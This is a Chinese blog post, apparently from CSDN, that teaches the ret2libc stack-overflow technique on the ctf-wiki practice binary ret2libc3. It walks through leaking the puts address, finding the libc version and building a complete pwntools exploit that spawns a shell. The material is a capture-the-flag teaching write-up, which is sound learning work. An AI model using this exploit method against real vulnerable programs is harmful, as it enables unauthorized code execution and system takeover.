ret2libc | by AriSan

最新推荐文章于 2024-04-07 19:07:29 发布
最新推荐文章于 2024-04-07 19:07:29 发布
阅读量287 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/AriSan_XD/article/details/105894531
版权

基本特征:程序开启了NX不可执行保护,无法执行我们注入的 shellcode

漏洞原理:在栈溢出的基础上,改变返回地址到某个函数的 plt 处,或者某个函数的具体位置(函数对应 got 表项的内容),改变寄存器的参数,达到执行system('/bin/sh')的目的

若程序提供了system()函数,我们可以直接选择返回到 plt 处,让它帮我们找到并执行函数,但是一般都没有这等好事。所以这个时候,我们就要利用ELF文件执行时的动态链接延时绑定,也就是说 got 表泄露的是已经执行过的函数的地址。所以我们的第一次sendline()是用来获取某个已执行函数的真实地址,再利用工具LibcSearcher来获取 libc 版本,计算出 libc 的基址,再计算出 libc 中的 system 和 /bin/sh 的地址

工具: LibcSearcher

例题: ctf-wiki_basic rop_ret2libc3
在这里插入图片描述
没有后门函数
checksec发现开启了NX保护

Arch:     i386-32-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x8048000)

通过ida查看伪代码发现明显的溢出点gets()同时我们还可以让puts()函数,作为输出函数,执行后泄露出自己真实的地址

再通过gdb得到栈空间为112

原理图如下,第一次发送payload,利用puts()函数泄露出自己的真实地址,再返回到_start()函数(程序的真正入口,方便再次执行system('/bin/sh')

通过泄露出的puts()got 地址算出 system/bin/sh 的地址,再次利用gets()覆盖泄露出的 system 的地址
在这里插入图片描述

exp:

#!/usr/bin/env python
from pwn import *
from LibcSearcher import *
elf=ELF('ret2libc3')
p=process('./ret2libc3')
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
start_addr = elf.symbols['_start']
payload1='A'*112+p32(puts_plt)+p32(start_addr)+p32(puts_got)
p.sendlineafter("!?",payload1)  #第一次溢出
puts_addr=u32(p.recv(4))  #泄露地址
libc=LibcSearcher('puts',puts_addr)   #获取libc版本号
libcbase=puts_addr-libc.dump("puts")  #计算基址
system_addr=libcbase+libc.dump("system")
binsh_addr=libcbase+libc.dump("str_bin_sh")
payload2='A'*112+p32(system_addr)+p32('AriSan')+p32(binsh_addr)  #第二次溢出
p.sendlineafter("!?",payload2)
p.interactive()
AriSan_XD
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
ret2libc2pwn 入门题
02-11
pwn 入门题
pwn小白入门06--ret2libc
weixin_45943522的博客
10-25 8057
概述: 前文介绍了ROP的基本原理,但前面的方法有一些局限性,一旦目标程序调用的函数较少,或者使用动态编译,就会导致我们可以利用的gadget变少,从而无法达到利用效果。为了解决这种问题,我们可以选择使用ROP的方式,到动态链接库里面寻找gadget。即ret2libc。 动态链接库: 说动态链接库之前,先简单介绍一下库,库是一种软件组件技术,库里面封装了数据和函数,比如常用的printf,get函数。前文所说的ret2syscall所使用的程序是静态链接的,即在程序编译的时候就将整个库链接到程序中,一般这
pwn入门:基本栈溢出之ret2libc详解(以32位+64位程序为例)
Bossfrank的博客
12-08 4968
本文详解了pwn题目中ret2libc的解题思路。简要介绍了plt表和got表的意义以及Linux中的延迟绑定技术,并通过32位和64位的两个具体题目具体的介绍了解pwn题的完整过程。
ret2libc
最新发布
2301_79863983的博客
04-07 629
以wiki中的libc的第三道例题为例,理解libc
Ret2libc
钞sir的博客
01-26 8769
三生三世十里桃花 她就像是一道疤 像风像雨像飞沙 像空气一样难抓 简介 ret2libc就是控制函数的执行libc中的函数,通常是返回至某个函数的 plt 处或者函数的具体位置 (即函数对应的 got 表项的内容)。一般情况下,我们会选择执行 system("/bin/sh"),因此我们通常需要找到 system 函数的地址 ret2libc通常可以分为下面这几类: 程序中自身就含有sys...
ROP-Ret2Libc概述和利用
fanghuapyk的博客
03-19 1472
ret2libc简介 ret2libc就是控制函数的执行libc中的函数,通常是返回至某个函数的 plt 处或者函数的具体位置 (即函数对应的 got 表项的内容)。一般情况下,我们会选择执行 system("/bin/sh"),因此我们通常需要找到 system 函数的地址 ret2libc通常可以分为下面这几类: 程序中自身就含有system函数和"/bin/sh"字符串 程序中自身就有system函数,但是没有"/bin/sh"字符串 程序中自身就没有system函数和"/bin/sh"字符串,但给
ret2libc类型题目思考-ret2libc1
qq_30528603的博客
05-29 176
一眼看到栈溢出,ret2libc这类型的题目就是要利用栈溢出将控制流转移到glibc库的函数中。这里我们一定是找的plt表而不是system字符串的地址,这是要分清楚的。关于plt表和got表参考我的其他博客,这个玩意我也理解了很久比较愚钝。但是我在IDA看到距离ebp是0x64h,就算换算成10进制在加4也是104,当时我就觉得很疑惑。打算复现CTFwiki中的三个ret2libc类型的实现。当函数要返回的时候,他将跳到system函数的地址去执行,此时他将把ebp+4的内容当做函数的第一个参数传递。
ret2libc1pwn 入门题
02-11
pwn 入门题
ret2libc exploit
07-07
exploit hack linux ret2libc
Performing a ret2libc Attack-InVoLuNTaRy
04-24
ret2libc
17ret2libc1_64 pwn 入门题
02-11
pwn 入门题
pwn基本ROP——ret2libc
turtlesd的博客
04-26 2201
ret2libc环境PLT表和GOT表ret2libc1原理漏洞分析使用checksec查看保护措施使用IDA32位进行调试获取偏移量payloadret2libc2原理漏洞分析checksec使用IDA进行调试payloadret2libc3原理漏洞分析checksec使用IDA调试payload 环境 retlibc1 ret2libc2 ret2libc3 PLT表和GOT表 在进行ret2libc学习之前,我们需要先了解一下PLT表与GOT表的内容。 Globle offset table(GOT)
linux中ret2libc入门与实践
counsellor的专栏
08-23 6764
前言 本来想找一个windows下的栈溢出漏洞的poc作为漏洞分析路程的开篇,但是一路走来遇到了太多的问题,大大小小,什么都有。同时因为工作事情比较多,能拿出来调试和写文章的时间也是断断续续。昨天刚有一点心得,今天就忘了一大半,同时会推翻自己之前的结论。 经过漫长的求证过程,打算把NX利剑-ret2libc这种方法和其原理用简单直接的方式展示出来。 简介 DEP-数据执行保护(Data...
[PWN][高级篇]ROP-ret2libc基础知识
网络安全知识分享
03-27 2057
ROP-ret2libc基础知识 前提知识准备Linux延时绑定机制Linux演示绑定机制的实现延迟绑定对我们有什么意义libc函数在哪?ret2libc使用条件如何使用libcplt表和got表的关系整体的跟踪 前提知识准备 Linux延时绑定机制 动态连接的程序调用了libc的库函数,但是libc在运行才被加载到内存中,调用libc函数时,才解析出函数在内存中的地址,为了帮助程序更好的利用内存空间,不用每次把所有的函数真实地址都写进去,用到哪个查哪个,之后在使用就会很方便。 Linux演示绑定机制的实现
ret2libc攻击原理+实例分析
yajuanpi4899的博客
11-09 3893
ret2libc攻击方式针对动态链接(Dynamic linking) 编译的程序,静态链接一般利用ROP能简单构造出payload进行攻击(详见ROP博客)。一般情况下无法在程序中直接找到system、execve这一类系统函数,动态链接 ...
PWN基础17:Ret2Libc 64位实例
prettyX的博客
07-24 4363
复现一下Ret2Libc 32位下的内存布局 针对这张图,我们在上一节做了细致的分析 32位的调用方式 32位系统中调用函数的方式:栈传递参数 构造函数调用将参数和返回地址放在栈上 构造执行write(1,buf2,20)后,再返回main函数 64位的调用方式 64位系统中使用寄存器传递参数:rdi、rsi、rdx、rcx、r8、r9(1-6个参数) 这节课,我们研究的源码 #include <stdio.h> char buf2[10]="ret2libc is goo
栈溢出实例--笔记三(ret2libc
一只青木呀
08-07 1342
栈溢出实例--笔记三(ret2libc)1、栈溢出含义及栈结构2、ret2libc基本思路3、实战3.1、二进制程序如下3.2、查看栈结构3.3、第一次栈溢出3.4、第二次栈溢出 1、栈溢出含义及栈结构 请参考栈溢出实例–笔记一(ret2text) 栈溢出实例–笔记二(ret2shellcode) 2、ret2libc基本思路 在当一个程序开启了NX(栈不可执行)的时候,我们没办法去写shellcode,而且程序中也没有system函数供我们调用的时候,那此时我们该如何做呢? 首先,程序本身没有system
PWN题型之Ret2Libc
swedsn
03-18 4156
文章目录前言0x1 :使用前提条件0x2 :为什么要这么使用0x3 :使用方法0x4 :实例二、使用步骤总结 前言 菜鸡总结,如有不对,请指点 0x1 :使用前提条件 查看保护:开启了NX保护,但是没有开启PLE保护,可以开启canary保护。但是这样就是两种题型结合了。 打开IDA查看源代码:存在溢出条件,但是没有system函数(/bin/sh)和 flag字样。 ` 0x2 :为什么要这么使用 由于缺少system函数,所以需要构造shellcode。但是开启了NX保护(可执行的不可修改,可修改不可执
pwn ret2libc原理
08-22
pwn ret2libc是一种攻击技术,其原理是通过利用程序中的栈溢出漏洞,来控制程序的执行流程,以达到执行libc中的函数的目的。 在ret2libc攻击中,程序会调用libc库中的函数,例如system函数,来执行特定的操作。但是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值